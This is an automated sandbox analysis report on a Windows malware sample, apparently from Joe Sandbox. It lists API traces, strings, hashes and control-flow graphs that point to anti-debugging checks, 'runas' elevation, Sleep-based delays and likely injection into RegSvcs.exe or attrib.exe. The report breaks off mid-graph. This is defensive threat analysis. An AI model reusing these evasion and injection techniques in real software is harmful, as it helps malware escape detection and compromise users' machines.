                                                                                                      • Sleep.KERNELBASE(?,?,c:/windows/SysWOW64/attrib.exe,?,?,?,?,?,?,?,C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exe,?,?,?,c:/windows/SysWOW64/attrib.exe), ref: 10001E94
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fseek$Ios_base_dtorSleep__fread_nolock_malloc_randstd::ios_base::_
                                                                                                      • String ID: C:/Windows/Microsoft.NET/Framework/v2.0.50727/RegSvcs.exe$C:/Windows/Microsoft.NET/Framework/v4.0.30319/RegSvcs.exe$c:/windows/SysWOW64/attrib.exe$c:/windows/System32/attrib.exe
                                                                                                      • API String ID: 3038481618-3945903909
                                                                                                      • Opcode ID: 8b6ab3bbf54d8d60ca3b578979d2ac06a711fb59963d7aa1397536f87cc2bae1
                                                                                                      • Instruction ID: d100b27a02b5bbde0dda4c9d14e16ef7ebeeb7e7a01e182a88264937f0dbb714
                                                                                                      • Opcode Fuzzy Hash: 8b6ab3bbf54d8d60ca3b578979d2ac06a711fb59963d7aa1397536f87cc2bae1
                                                                                                      • Instruction Fuzzy Hash: B302D775D00268CFEB11CF68C884B9DBBB5FF49340F1141AAE849AB255DB70AE85CF51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 480 d15d78-d15de7 call d1bf07 GetVersionExW call d184b7 485 d54f0c-d54f1f 480->485 486 d15ded 480->486 487 d54f20-d54f24 485->487 488 d15def-d15df1 486->488 489 d54f27-d54f33 487->489 490 d54f26 487->490 491 d15df7-d15e56 call d196d9 call d179ed 488->491 492 d54f4b 488->492 489->487 493 d54f35-d54f37 489->493 490->489 505 d550ad-d550b4 491->505 506 d15e5c-d15e5e 491->506 496 d54f52-d54f5e 492->496 493->488 495 d54f3d-d54f44 493->495 495->485 498 d54f46 495->498 499 d15ecc-d15ee6 GetCurrentProcess IsWow64Process 496->499 498->492 501 d15f45-d15f4b 499->501 502 d15ee8 499->502 504 d15eee-d15efa 501->504 502->504 511 d15f00-d15f0f LoadLibraryA 504->511 512 d550f2-d550f6 GetSystemInfo 504->512 507 d550d4-d550d7 505->507 508 d550b6 505->508 509 d15e64-d15e67 506->509 510 d54fae-d54fc1 506->510 517 d550c2-d550ca 507->517 518 d550d9-d550e8 507->518 516 d550bc 508->516 509->499 513 d15e69-d15eab 509->513 514 d54fc3-d54fcc 510->514 515 d54fea-d54fec 510->515 519 d15f11-d15f1f GetProcAddress 511->519 520 d15f4d-d15f57 GetSystemInfo 511->520 513->499 522 d15ead-d15eb0 513->522 523 d54fce-d54fd4 514->523 524 d54fd9-d54fe5 514->524 525 d55021-d55024 515->525 526 d54fee-d55003 515->526 516->517 517->507 518->516 527 d550ea-d550f0 518->527 519->520 528 d15f21-d15f25 GetNativeSystemInfo 519->528 521 d15f27-d15f29 520->521 535 d15f32-d15f44 521->535 536 d15f2b-d15f2c FreeLibrary 521->536 529 d54f63-d54f6d 522->529 530 d15eb6-d15ec0 522->530 523->499 524->499 533 d55026-d55041 525->533 534 d5505f-d55062 525->534 531 d55005-d5500b 526->531 532 d55010-d5501c 526->532 527->517 528->521 541 d54f80-d54f8a 529->541 542 d54f6f-d54f7b 529->542 530->496 537 d15ec6 530->537 531->499 532->499 538 d55043-d55049 533->538 539 d5504e-d5505a 533->539 534->499 540 d55068-d5508f 534->540 536->535 537->499 538->499 539->499 543 d55091-d55097 540->543 544 d5509c-d550a8 540->544 545 d54f9d-d54fa9 541->545 546 d54f8c-d54f98 541->546 542->499 543->499 544->499 545->499 546->499
                                                                                                      APIs
                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00D15DA7
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      • GetCurrentProcess.KERNEL32(?,00DADC2C,00000000,?,?), ref: 00D15ED3
                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D15EDA
                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D15F05
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D15F17
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D15F25
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D15F2C
                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00D15F51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                      • API String ID: 3290436268-3101561225
                                                                                                      • Opcode ID: 13bec16945562fc62789fd1506f94bed9705f953073a1650df863d45c4ccd376
                                                                                                      • Instruction ID: 70cad3ab6d4f61748549f7e242cb4acb41ff2a8345f57893f116a96db22e7721
                                                                                                      • Opcode Fuzzy Hash: 13bec16945562fc62789fd1506f94bed9705f953073a1650df863d45c4ccd376
                                                                                                      • Instruction Fuzzy Hash: 8AA1943180A7C0DFCB12EB68BCC11F97F596B66305B18589DE881DB365C66D8988CF32
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D132EF,?), ref: 00D13342
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D132EF,?), ref: 00D13355
                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00DE2418,00DE2400,?,?,?,?,?,?,00D132EF,?), ref: 00D133C1
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                        • Part of subcall function 00D141E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D133E9,00DE2418,?,?,?,?,?,?,?,00D132EF,?), ref: 00D14227
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,00DE2418,?,?,?,?,?,?,?,00D132EF,?), ref: 00D13442
                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00D53C8A
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00DE2418,?,?,?,?,?,?,?,00D132EF,?), ref: 00D53CCB
                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DD31F4,00DE2418,?,?,?,?,?,?,?,00D132EF), ref: 00D53D54
                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D53D5B
                                                                                                        • Part of subcall function 00D1345A: GetSysColorBrush.USER32(0000000F), ref: 00D13465
                                                                                                        • Part of subcall function 00D1345A: LoadCursorW.USER32(00000000,00007F00), ref: 00D13474
                                                                                                        • Part of subcall function 00D1345A: LoadIconW.USER32(00000063), ref: 00D1348A
                                                                                                        • Part of subcall function 00D1345A: LoadIconW.USER32(000000A4), ref: 00D1349C
                                                                                                        • Part of subcall function 00D1345A: LoadIconW.USER32(000000A2), ref: 00D134AE
                                                                                                        • Part of subcall function 00D1345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D134C6
                                                                                                        • Part of subcall function 00D1345A: RegisterClassExW.USER32(?), ref: 00D13517
                                                                                                        • Part of subcall function 00D1353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D13568
                                                                                                        • Part of subcall function 00D1353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D13589
                                                                                                        • Part of subcall function 00D1353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D132EF,?), ref: 00D1359D
                                                                                                        • Part of subcall function 00D1353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00D132EF,?), ref: 00D135A6
                                                                                                        • Part of subcall function 00D138F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D139C3
                                                                                                      Strings
                                                                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00D53C84
                                                                                                      • runas, xrefs: 00D53D4F
                                                                                                      • AutoIt, xrefs: 00D53C7F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                      • API String ID: 683915450-2030392706
                                                                                                      • Opcode ID: 18ae84decbdac6a7910b81824d1c84b098518e4d98d2ccf96f2617efa20e8602
                                                                                                      • Instruction ID: 6763a051117efc3f751281ea921c1d41152e232dc3628c0d5e605f8631d6bd60
                                                                                                      • Opcode Fuzzy Hash: 18ae84decbdac6a7910b81824d1c84b098518e4d98d2ccf96f2617efa20e8602
                                                                                                      • Instruction Fuzzy Hash: B351D530108385BEDB05FB60FC56DFA7BA9DF95740F44042DF482962A2CE648A8DC772
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • FindFirstFileW.KERNELBASE(xi50_104i058ec764_103,?), ref: 100022DB
                                                                                                      • FindFirstFileW.KERNELBASE(aq56_92,?), ref: 10002312
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID: C:/wql455oi0/ef2dsio3421.243$aq56_92$xi50_104i058ec764_103
                                                                                                      • API String ID: 1974802433-568226624
                                                                                                      • Opcode ID: 47d1f16bc1c2b1bce95c1ffbb8f0afb035622d64744e0c7f937d2ff797ab8a04
                                                                                                      • Instruction ID: fd2d02aef8a3c17957bbcc3c316ced0a68dbc54f468aacb99b8e5ddcf23d86f5
                                                                                                      • Opcode Fuzzy Hash: 47d1f16bc1c2b1bce95c1ffbb8f0afb035622d64744e0c7f937d2ff797ab8a04
                                                                                                      • Instruction Fuzzy Hash: 98113A71A0498856F310D7789C467FA77D8CB84378F01034EF9AD8A1E1DF34A8808B87
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 10005EE6: __fsopen.LIBCMT ref: 10005EF1
                                                                                                      • _fseek.LIBCMT ref: 10001B83
                                                                                                      • _malloc.LIBCMT ref: 10001B9C
                                                                                                        • Part of subcall function 10005652: __FF_MSGBANNER.LIBCMT ref: 10005669
                                                                                                        • Part of subcall function 10005652: __NMSG_WRITE.LIBCMT ref: 10005670
                                                                                                        • Part of subcall function 10005652: RtlAllocateHeap.NTDLL(01350000,00000000,00000001,00000001,?,?,?,10004E11,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 10005695
                                                                                                      • _fseek.LIBCMT ref: 10001BA8
                                                                                                        • Part of subcall function 1000696B: __lock_file.LIBCMT ref: 100069AC
                                                                                                        • Part of subcall function 1000696B: __fseek_nolock.LIBCMT ref: 100069BB
                                                                                                      • __fread_nolock.LIBCMT ref: 10001BB3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fseek$AllocateHeap__fread_nolock__fseek_nolock__fsopen__lock_file_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1580753557-0
                                                                                                      • Opcode ID: 1d2aa94d7580356d5346c34d582187f735a0b8e50a59a5e0cd1b48a1f6b9c356
                                                                                                      • Instruction ID: 0909840296ae80f6c22ee791ea7857d2ed74ef3e31d12aab5468f72c7f1240c5
                                                                                                      • Opcode Fuzzy Hash: 1d2aa94d7580356d5346c34d582187f735a0b8e50a59a5e0cd1b48a1f6b9c356
                                                                                                      • Instruction Fuzzy Hash: 2A11EC70900204BBEB14DFB99C82BADB7FDEF14241F30856DF585B714AE772A9118B54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,00D54686), ref: 00D7E397
                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00D7E3A6
                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00D7E3B7
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00D7E3C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2695905019-0
                                                                                                      • Opcode ID: e7aa4d6e720da7e00b5359725ac51a58a75dcbaff1f14f61825b02e5488e265b
                                                                                                      • Instruction ID: c3d3d3b8d798659d0981bdf3b1b19164c54900ab3c812484686001c996265214
                                                                                                      • Opcode Fuzzy Hash: e7aa4d6e720da7e00b5359725ac51a58a75dcbaff1f14f61825b02e5488e265b
                                                                                                      • Instruction Fuzzy Hash: 2DF0E530411A1057C211673CAC0D9AA77AE9E46336B148751F87BC36F0E7B0DDA586B9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _memcpy_s.LIBCMT ref: 100060D4
                                                                                                      • __read_nolock.LIBCMT ref: 10006132
                                                                                                      • __filbuf.LIBCMT ref: 10006155
                                                                                                        • Part of subcall function 10008911: __getptd_noexit.LIBCMT ref: 10008911
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 1559077322-0
                                                                                                      • Opcode ID: 68c746d782335b4db56740a0819c74e48de610b75643bc7f23ed8aad9251ab38
                                                                                                      • Instruction ID: c25a32d11bcf9e3449191675127a21711ae7f9c0bb305b1f17f27698fd0c18df
                                                                                                      • Opcode Fuzzy Hash: 68c746d782335b4db56740a0819c74e48de610b75643bc7f23ed8aad9251ab38
                                                                                                      • Instruction Fuzzy Hash: 25519370A00706ABFB14CFA58C8169F77E7EF483E0F348729E865962D9DB719E518B40
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(?,?,00D3504E,?,00DD98D8,0000000C,00D351A5,?,00000002,00000000), ref: 00D35099
                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00D3504E,?,00DD98D8,0000000C,00D351A5,?,00000002,00000000), ref: 00D350A0
                                                                                                      • ExitProcess.KERNEL32 ref: 00D350B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 982f9f884f7f92d45675b89350a9bc72d0c211594a5ed3a08d33c80a0195c59d
                                                                                                      • Instruction ID: 92f72a8107650085f7295a6e9d332c8ef5e53f09a17d9787c75ed8f65ffde495
                                                                                                      • Opcode Fuzzy Hash: 982f9f884f7f92d45675b89350a9bc72d0c211594a5ed3a08d33c80a0195c59d
                                                                                                      • Instruction Fuzzy Hash: CAE0B632400648AFCF256F54ED09E593B6AEF41381F044014F8168A626DB36DD42CBF0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 10008911: __getptd_noexit.LIBCMT ref: 10008911
                                                                                                      • __lock_file.LIBCMT ref: 10006AE6
                                                                                                        • Part of subcall function 1000557C: __lock.LIBCMT ref: 1000559F
                                                                                                      • __fclose_nolock.LIBCMT ref: 10006AF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                      • String ID:
                                                                                                      • API String ID: 2800547568-0
                                                                                                      • Opcode ID: 1b1138aff8e5b444ee6c0ddd987072eb3632a9b47053f41f3f6c9103f033a9bf
                                                                                                      • Instruction ID: 7da25c7f593ff69d6ca0429c7602a791042fc789a6f8d73bb250a3ee3faf0873
                                                                                                      • Opcode Fuzzy Hash: 1b1138aff8e5b444ee6c0ddd987072eb3632a9b47053f41f3f6c9103f033a9bf
                                                                                                      • Instruction Fuzzy Hash: DDF0F035E002119AF710EB648C0175E7AE2EF063B1F20C209A811BB1C9CF3CAA418F52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __lock_file.LIBCMT ref: 100068A4
                                                                                                      • __ftell_nolock.LIBCMT ref: 100068AF
                                                                                                        • Part of subcall function 10008911: __getptd_noexit.LIBCMT ref: 10008911
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                      • String ID:
                                                                                                      • API String ID: 2999321469-0
                                                                                                      • Opcode ID: 0449316f2be15df70f45aa83a301618d2bd2acabc55347d35a5f5e4ff8f1fbbd
                                                                                                      • Instruction ID: c63eac637f842b68c66abf28017600cb1f849b36ff0af8be8cb93427db4141e4
                                                                                                      • Opcode Fuzzy Hash: 0449316f2be15df70f45aa83a301618d2bd2acabc55347d35a5f5e4ff8f1fbbd
                                                                                                      • Instruction Fuzzy Hash: CBE0E535800615AAFB00EB749C0234E3691DF0A3F1F314302F410EF1C9CF38AA429752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetInputState.USER32 ref: 00D1EEB7
                                                                                                      • timeGetTime.WINMM ref: 00D1F0B7
                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D1F1D8
                                                                                                      • TranslateMessage.USER32(?), ref: 00D1F22B
                                                                                                      • DispatchMessageW.USER32(?), ref: 00D1F239
                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D1F24F
                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00D1F261
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                      • String ID:
                                                                                                      • API String ID: 2189390790-0
                                                                                                      • Opcode ID: 34921e81f8d1e813657ecb017237687464b67465eb338801ff18c055101578cc
                                                                                                      • Instruction ID: e64aa9903453d468d210851048b39f68876bb1b758eadd9b621f707b60dcb3b7
                                                                                                      • Opcode Fuzzy Hash: 34921e81f8d1e813657ecb017237687464b67465eb338801ff18c055101578cc
                                                                                                      • Instruction Fuzzy Hash: E032D070604341EFD724DF24D884BAAB7E5FF96304F184529F4958B292CB71E984CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 369 10001e68-10001e6f 370 10001e70-10001e9c call 10001950 call 10006275 Sleep 369->370 375 10001ef3-10001f49 call 10002740 370->375 376 10001e9e-10001ea1 370->376 380 10001f75-10001f79 375->380 381 10001f4b-10001f56 375->381 376->370 378 10001ea3 376->378 378->375 383 10002018-10002027 380->383 384 10001f7f-10001f81 380->384 381->380 382 10001f58-10001f72 381->382 382->380 387 10002049-10002087 call 10004595 383->387 388 10002029-1000202d 383->388 385 10001f83-10001f96 call 100037a0 call 10006aa1 384->385 386 10001f99-10002015 384->386 385->386 386->383 399 100020c3-10002119 call 10002740 387->399 400 10002089-1000208b 387->400 389 10002040-10002046 call 100062c2 388->389 390 1000202f-10002036 388->390 389->387 390->389 401 10002038-1000203c 390->401 407 10002145-10002149 399->407 408 1000211b-10002126 399->408 400->399 404 1000208d 400->404 401->389 406 10002090-100020bc call 10001950 call 10006275 Sleep 404->406 406->399 424 100020be-100020c1 406->424 411 100021e8-100021f7 407->411 412 1000214f-10002151 407->412 408->407 410 10002128-10002142 408->410 410->407 415 10002219-10002257 call 10004595 411->415 416 100021f9-100021fd 411->416 417 10002153-10002166 call 100037a0 call 10006aa1 412->417 418 10002169-100021e5 412->418 430 10002298-1000229a 415->430 431 10002259-1000225b 415->431 420 10002210-10002216 call 100062c2 416->420 421 100021ff-10002206 416->421 417->418 418->411 420->415 421->420 433 10002208-1000220c 421->433 424->399 424->406 434 10001cd0-10001d26 call 10002740 430->434 435 100022a0-100022a6 430->435 431->435 436 1000225d 431->436 433->420 443 10001d52-10001d56 434->443 444 10001d28-10001d33 434->444 439 10002260-1000228c call 10001950 call 10006275 Sleep 436->439 439->435 456 1000228e-10002291 439->456 447 10001df5-10001e04 443->447 448 10001d5c-10001d5e 443->448 444->443 446 10001d35-10001d4f 444->446 446->443 449 10001e26-10001e64 call 10004595 447->449 450 10001e06-10001e0a 447->450 452 10001d60-10001d73 call 